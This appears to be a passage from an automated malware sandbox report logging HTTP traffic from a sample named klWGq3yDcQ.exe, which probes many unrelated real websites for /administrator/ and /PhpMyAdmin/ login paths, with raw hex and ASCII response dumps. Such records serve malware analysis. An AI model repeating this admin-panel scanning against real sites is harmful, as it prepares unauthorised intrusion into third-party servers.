                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: http://viidelta.com/administrator/
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.605175972 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:31 GMT
                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    X-UD-METHOD: vm_construction
                                                                                                                                                                                                    Server: UD Forwarding 3.1
                                                                                                                                                                                                    Data Raw: 32 33 32 32 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 48 69 65 72 20 65 6e 74 73 74 65 68 74 20 76 69 69 64 65 6c 74 61 2e 63 6f 6d 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 53 48 4f 52 54 43 55 54 20 49 43 4f 4e 22 20 68 72 65 66 3d 22 2f 67 66 78 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 3c 74 69 74 6c 65 3e 76 69 69 64 65 6c 74 61 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 62 6f 64 79 7b 68 65 69 67 68 74 3a 31 30 30 25 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 62 66 62 66 62 7d 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 56 65 72 64 61 6e 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 27 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 41 77 41 41 41 50 2b 43 41 4d 41 41 41 41 49 47 51 35 61 41 41 41 44 41 46 42 4d 56 45 58 36 2b 76 72 36 2b 76 6e 35 2b 76 72 35 2b 76 6e 36 2b 66 72 36 2b 66 6e 35 2b 66 6e 34 2b 50 6a 34 2b 50 66 33 2b 50 6a 33 2b 50 66 34 39 2f 6a 33 39 2f 66 33 39 2f 62 32 39 76 62 32 39 76 58 31 39 76 62 31 39 76 58 32 39 66 62 31 39 66 58 31 39 66 54 30 39 50 54 30 39 50 50 7a 39 50 54 7a 39 50 50 30 38 2f 54 30 38 2f 50 7a 38 2f 50 79 38 76 4c 79 38 76 48 78 38 76 48 79 38 66 4c 78 38 66 48 78 38 50 48 77 38 50 44 77 38 4f 2f 76 38 50 44 76 38 4f 2f 77 37 2f 44 77 37 2b 2f 76 37 2b 2f 75 37 75 37 75 37 75 33 74 37 75 33 75 37 65 37 75 37 65 33 74 37 65 33 73 37 4f 7a 73 37 4f 76 72 37 4f 7a 72 37 4f 76 73 36 2b 7a 72 36 2b 76 72 36 2b 72 71 36 75 72 71 36 75 6e 70 36 75 72 70 36 75 6e 71 36 65 6e 70 36 65 6e 70 36 4f 6e 6f 36 4f 6a 6f 36 4f 66 6e 36 4f 6a 6e 36 4f 66 6f 35 2b 6a 6f 35 2b 66 6e 35 2b 66 6d 35 75 62 6d 35 75 58 6c 35 75 62 6c 35 75 58 6d 35 65 62 6d 35 65 58 6c 35 65 58 6b 35 4f 54 6b 35 4f 50 6a 35 4f 54 6a 35 4f 50 6b 34 2b 54 6a 34 2b 50 6a 34 2b 4c 69 34 75 4c 69 34 75 48 68 34 75 4c 68 34 75 48 69 34 65 4c 69 34 65 48 68 34 65 48 67 34 4f 44 67 34 4e 2f 66 34 4f 44 67 33 2b 44 66 33 39 2f 66 33 39 37 65 33 74 37 65 33 74 33 64 33 74 37 65 33 64 37 64 33 64 33 64 33 64 7a 63 33 4e 7a 63 33 4e 76 62 33 4e 7a 62 33 4e 76 63 32 39 7a 62 32 39 76 62 32 39 72 61 32 74 72 61 32 74 6e 5a 32 74 72 61 32 64 72 61 32 64 6e 59 32 74 6e 5a 32 64 6e 59 32 4e 6a 59 32 4e 66 58 32 4e 6a 58 32 4e 66 59 31 39 6a 58 31 39 66 58 31 39 62 57 31 74 62 57 31 74 58 56 31 74 62 56 31 74 58 57 31 64 62 57 31 64 58 56 31 64 58 55 31 4e 54 55 31 4e 50 54 31 4e 54 54 31 4e 50 55 30 39 54 55 30 39 50 54 30 39 50 53 30 74 4c 53 30 74 48 52 30 74 4c 52 30 74 48 53 30 64 4c 53 30 64 48 52 30 64 48 51 30 4e 44 51 30 4d 2f 50 30 4e 44 50 30 4d 2f 51 7a 39 44 50 7a 38 2f 50 7a 38 37 4e 7a 63 33 4d 7a 4d 33 4d
                                                                                                                                                                                                    Data Ascii: 23223<!DOCTYPE html><html lang="de"><head><meta name="description" content="Hier entsteht viidelta.com"><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><link rel="SHORTCUT ICON" href="/gfx/favicon.ico"><title>viidelta.com</title><style>*{margin:0;padding:0}html,body{height:100%;background-color:#fbfbfb}body{font-family:Arial,Verdana,sans-serif;text-align:center;margin:0 auto;background:url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAwAAAP+CAMAAAAIGQ5aAAADAFBMVEX6+vr6+vn5+vr5+vn6+fr6+fn5+fn4+Pj4+Pf3+Pj3+Pf49/j39/f39/b29vb29vX19vb19vX29fb19fX19fT09PT09PPz9PTz9PP08/T08/Pz8/Py8vLy8vHx8vHy8fLx8fHx8PHw8PDw8O/v8PDv8O/w7/Dw7+/v7+/u7u7u7u3t7u3u7e7u7e3t7e3s7Ozs7Ovr7Ozr7Ovs6+zr6+vr6+rq6urq6unp6urp6unq6enp6enp6Ono6Ojo6Ofn6Ojn6Ofo5+jo5+fn5+fm5ubm5uXl5ubl5uXm5ebm5eXl5eXk5OTk5OPj5OTj5OPk4+Tj4+Pj4+Li4uLi4uHh4uLh4uHi4eLi4eHh4eHg4ODg4N/f4ODg3+Df39/f397e3t7e3t3d3t7e3d7d3d3d3dzc3Nzc3Nvb3Nzb3Nvc29zb29vb29ra2tra2tnZ2tra2dra2dnY2tnZ2dnY2NjY2NfX2NjX2NfY19jX19fX19bW1tbW1tXV1tbV1tXW1dbW1dXV1dXU1NTU1NPT1NTT1NPU09TU09PT09PS0tLS0tHR0tLR0tHS0dLS0dHR0dHQ0NDQ0M/P0NDP0M/Qz9DPz8/Pz87Nzc3MzM3M
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.605187893 CET1340INData Raw: 7a 4d 7a 4d 79 38 7a 4c 79 38 76 4b 79 38 72 4a 79 63 6e 49 79 4d 6a 48 79 4d 6e 48 79 4d 66 49 78 38 6a 48 78 38 66 48 78 38 62 46 78 63 58 45 78 4d 58 45 78 4d 54 44 78 4d 50 45 77 38 54 45 77 38 50 44 77 38 50 42 77 63 48 41 77 4d 48 41 77 4d
                                                                                                                                                                                                    Data Ascii: zMzMy8zLy8vKy8rJycnIyMjHyMnHyMfIx8jHx8fHx8bFxcXExMXExMTDxMPEw8TEw8PDw8PBwcHAwMHAwMC/wL/Av8DAv7+/v7++vr6+vr29vr69vr2+vb69vb29vby8vLy8vLu7vLy8u7y7u7u7u7q7urq5ubm4uLi3uLi3uLe4t7i4t7e3t7e2tra2trW1tra1trW2tba1tbW1tbS0tLS0tLOztLSztLO0s7S0s7Ozs7OysrK
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.605212927 CET1340INData Raw: 2b 34 6d 37 43 46 42 77 68 76 6a 43 4b 47 41 75 36 6b 2f 4e 6c 6c 50 45 37 63 43 39 79 70 69 2b 6b 34 4f 72 39 35 66 30 56 67 30 7a 33 72 68 32 4e 79 59 45 50 61 4f 4f 67 77 63 68 69 47 58 39 51 6b 70 6b 47 6c 43 6f 65 77 6a 46 77 54 67 31 57 53
                                                                                                                                                                                                    Data Ascii: +4m7CFBwhvjCKGAu6k/NllPE7cC9ypi+k4Or95f0Vg0z3rh2NyYEPaOOgwchiGX9QkpkGlCoewjFwTg1WSWd5kdC2o2BDZUEBb7rQJI4SGZy1wN9G0ApoYWu9znB6ys5mXgnaZHUTBrsjt6ApvMr21VUrznKBuKiefMsyOrw6WYJ3YkW+MWwFVc3DtgHChXYWiKcJOtFd2Rxfs6LXDh8ebIkTjbjeQLdnI9BR6yEazqfpmm3gX2
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.605226040 CET1340INData Raw: 66 52 47 39 48 62 45 4b 61 39 58 6c 35 5a 30 58 47 77 70 69 34 78 65 54 4e 36 63 44 76 6f 58 4d 70 47 70 6d 73 7a 34 74 50 71 62 50 6a 59 6a 74 30 63 72 64 5a 74 31 69 77 53 33 5a 70 75 63 6d 77 49 48 6b 49 4e 74 6f 73 63 6c 75 30 6c 4c 58 75 55
                                                                                                                                                                                                    Data Ascii: fRG9HbEKa9Xl5Z0XGwpi4xeTN6cDvoXMpGpmsz4tPqbPjYjt0crdZt1iwS3ZpucmwIHkINtosclu0lLXuU9I7NdYnnfmTxPXq40H2NK0mnvWHCL+kCFOtyrWjGdJNOEFO5SVlriQ2SdQD/yIaVPPSf4bb/5DMJE6EJG5m6t/TZTv65mqg8SGi2UQFXWR1LYvlLmvMOaKJ1GITEyLNP2i4oCmqp/jnBjKtjztg0aWcwb/o990mKD
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.605238914 CET1340INData Raw: 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 71 41 41 41 41 4b 33 43 41 4d 41 41 41 42 74 4d 51 33 55 41 41 41 42 67 46 42 4d 56 45 55 41 41 41 44 52 30 64 48 2f 2f 2f 2b 78 73 62 48 2f 2f 2f 2b 71 71 71 72 35 2b 66 6d 71 71 71 71 6f 71
                                                                                                                                                                                                    Data Ascii: KGgoAAAANSUhEUgAAAqAAAAK3CAMAAABtMQ3UAAABgFBMVEUAAADR0dH///+xsbH///+qqqr5+fmqqqqoqKj6+vqrq6v4+PipqamoqKj5+fmoqKjQ0NCnp6enp6f6+vqmpqbX19enp6enp6dlY2H7+/unp6empqbc3NzFxcX8/Pynp6empqazs7ODg4L6+vrBwcGmpqbR0dHc3NyqeF9fXl6mpqb7+/tcOx6mpqbS0tLe3t6+vb
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.605252028 CET1340INData Raw: 4e 46 41 45 7a 6f 68 31 46 55 55 4e 44 48 51 56 47 6f 51 68 55 74 46 59 30 48 6f 41 7a 6a 78 69 6c 48 6f 35 4d 77 30 4e 4b 4f 4a 47 35 34 6a 6e 67 52 34 49 70 35 4b 52 66 73 59 54 6c 68 4e 58 30 34 4b 56 62 71 42 55 30 76 79 53 4f 76 67 47 67 66
                                                                                                                                                                                                    Data Ascii: NFAEzoh1FUUNDHQVGoQhUtFY0HoAzjxilHo5Mw0NKOJG54jngR4Ip5KRfsYTlhNX04KVbqBU0vySOvgGgfGtURrOh+RHXA7Q0oVMFqgSR8Lp2G5yEsHrM5HOcuIoqJJRJOAjkBAIYTW1Is8HpgamSPGQYkHTYOTXwkXUL5KtB9EoTMZeCbz0u54BpveeCIvCVKKu1nNCw5l8MgpvOqaI0phB1TElFp/9fJ5cjadb80NPBWmoJFD
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.605323076 CET1340INData Raw: 55 77 6c 61 33 6f 63 71 45 45 4b 30 34 66 66 42 5a 53 6f 36 6e 45 74 62 53 71 59 4e 76 78 65 55 54 4f 6d 6c 2f 66 50 4a 35 68 6b 65 79 32 2b 33 4c 55 30 6d 76 61 33 75 71 6c 34 6f 64 6d 33 44 46 6b 70 78 30 47 61 59 6c 77 44 4d 34 36 78 6e 31 2b
                                                                                                                                                                                                    Data Ascii: Uwla3ocqEEK04ffBZSo6nEtbSqYNvxeUTOml/fPJ5hkey2+3LU0mva3uql4odm3DFkpx0GaYlwDM46xn1+6roqDNKiedkuBV4WtJ6LsrbgEGoz0Ojh0t0Mm0yOmlGTUHtxrxZ7OIVGIzaBgk6S/28K/AjzCgz4KmsqO+3Qyl+w2cFwl46M3sXZJJYOYVLNBUn6WSvpLnUX5WI2tNOWJrRdfMmH4pS5J8vjFLm09C+Q5Qqj3XPjs
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.605334997 CET1340INData Raw: 57 2b 47 4e 5a 66 38 2b 36 6e 75 6d 75 4c 6a 34 6c 73 31 62 53 4e 4a 64 58 2f 39 66 54 4f 55 6d 45 42 35 38 6c 5a 58 64 58 56 2f 64 70 57 46 54 68 51 30 61 37 57 39 32 36 72 43 71 55 75 49 34 6d 66 72 66 47 69 39 43 61 52 64 6d 4e 38 73 53 75 7a
                                                                                                                                                                                                    Data Ascii: W+GNZf8+6numuLj4ls1bSNJdX/9fTOUmEB58lZXdXV/dpWFThQ0a7W926rCqUuI4mfrfGi9CaRdmN8sSuzqAF749AacZD6tad0nJpCKb0c82zJP8OxSnUjnocNqZzCYYY2nceWWmfUvGJacIqcofR/ck8EvCSVeyioqq582rBfoqeWVUvuiQrQpspdVT1XQImW/Ue/e7z7S8D0IFSv8u5nuiEM4NTW/3saxqu2UWiQ6JpQm0hKG
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.605346918 CET1340INData Raw: 4f 78 6a 69 62 39 58 6a 67 35 6e 31 70 4b 51 71 6a 4e 63 36 65 6b 49 6d 68 71 73 4f 6e 69 65 57 5a 71 42 78 41 41 71 4d 51 4b 6f 69 57 56 61 4c 73 39 71 78 4b 37 43 58 5a 39 4d 65 57 35 56 6c 4a 59 67 45 4a 52 6c 65 49 36 76 78 7a 78 53 61 6d 61
                                                                                                                                                                                                    Data Ascii: Oxjib9Xjg5n1pKQqjNc6ekImhqsOnieWZqBxAAqMQKoiWVaLs9qxK7CXZ9MeW5VlJYgEJRleI6vxzxSamaPoD2gmbXVq+3/BG+KvWzTbXFtTZcPLJ2SfjfvjIA3RmcleM+ihZfaGTAR2tfHzcxMvXaftcbV/NRL0zDdW5aBsp6cFNmmrCvSuh2cX3G5D09JB6/kn8HpXJtFI9vQWe6GeX9uyynrrSLoYXBc/SgI4GcydnZ2dTQe
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.605360031 CET1340INData Raw: 48 2f 33 4d 5a 6d 71 4a 2f 58 4a 69 71 66 33 54 47 66 6c 33 2f 45 31 78 62 4a 37 58 34 78 4d 67 39 47 36 51 69 6b 34 78 53 41 69 41 65 4f 44 47 4a 6f 70 67 43 34 4e 54 44 47 4e 2f 47 6b 64 6f 76 31 4b 61 48 4c 77 50 71 36 64 50 41 74 31 72 49 30
                                                                                                                                                                                                    Data Ascii: H/3MZmqJ/XJiqf3TGfl3/E1xbJ7X4xMg9G6Qik4xSAiAeODGJopgC4NTDGN/Gkdov1KaHLwPq6dPAt1rI0onmYZ0WJHcl++XG32VDpLD58ldKN7jIG0m4HOi+lnWj6C0EZA2+ySxkcSHtWJ+WyLdaKcjySACSO4wU56QEVEV7zmS/x93GBTKe13LoejB04egRREmx1LRPM53dSJqA9uLINXGz27Nc9MaVLQ1rsnDZXyT/SzzC5x
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.787671089 CET1340INData Raw: 79 38 68 6f 63 30 62 4c 4a 43 53 43 4a 54 67 4b 4f 52 54 44 6b 64 37 67 4d 30 4e 42 48 41 39 51 2f 75 64 33 66 38 73 77 66 35 78 4d 77 68 34 4b 4f 77 65 65 78 33 69 43 7a 6a 4a 32 55 54 69 70 4a 57 30 71 46 30 58 70 39 76 71 39 76 67 6b 34 73 76
                                                                                                                                                                                                    Data Ascii: y8hoc0bLJCSCJTgKORTDkd7gM0NBHA9Q/ud3f8swf5xMwh4KOweex3iCzjJ2UTipJW0qF0Xp9vq9vgk4sv6MONpvSpvUBopqw975WUOdaEvTl8QzUf+rZNrAJnlDaJedxPUKndwo+27w8JkVJfrV4eoMp8PTxxBDjkykoHz71y8z9u/Dtf/t0ElrGUX4tkvkUVFe7mepqPCBdL3+qhOqbFNuEE3j6IHhq5Uj5Uk85zMHnoFj/di


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    73192.168.2.45581518.229.0.171806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.421947956 CET237OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: rechagricola.com.br
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.627368927 CET426INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:31 GMT
                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                    Content-Length: 162
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Location: https://rechagricola.com.br/administrator/
                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    74192.168.2.455666133.130.97.143806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.458630085 CET228OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: digdig.org
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.720058918 CET492INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:31 GMT
                                                                                                                                                                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                                                                                    Content-Length: 212
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /administrator/ was not found on this server.</p></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    75192.168.2.455906178.32.41.233806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.534804106 CET234OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                    Host: rochester-gauges.be
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.704914093 CET546INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Content-Type: text/html; charset=us-ascii
                                                                                                                                                                                                    Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:55:03 GMT
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Content-Length: 315
                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    76192.168.2.455609117.20.63.148806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.536839008 CET241OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: student.debritto.sch.id
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.893018961 CET877INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:31 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    Content-Length: 546
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Keep-Alive: timeout=60
                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 77 65 62 6d 61 73 74 65 72 40 73 74 75 64 65 6e 74 2e 64 65 62 72 69 74 74 6f 2e 73 63 68 2e 69 64 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@student.debritto.sch.id to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p></body></html>
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.895240068 CET306OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                    Host: student.debritto.sch.id
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: http://student.debritto.sch.id/administrator/
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.251045942 CET811INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:32 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    Content-Length: 546
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Keep-Alive: timeout=60
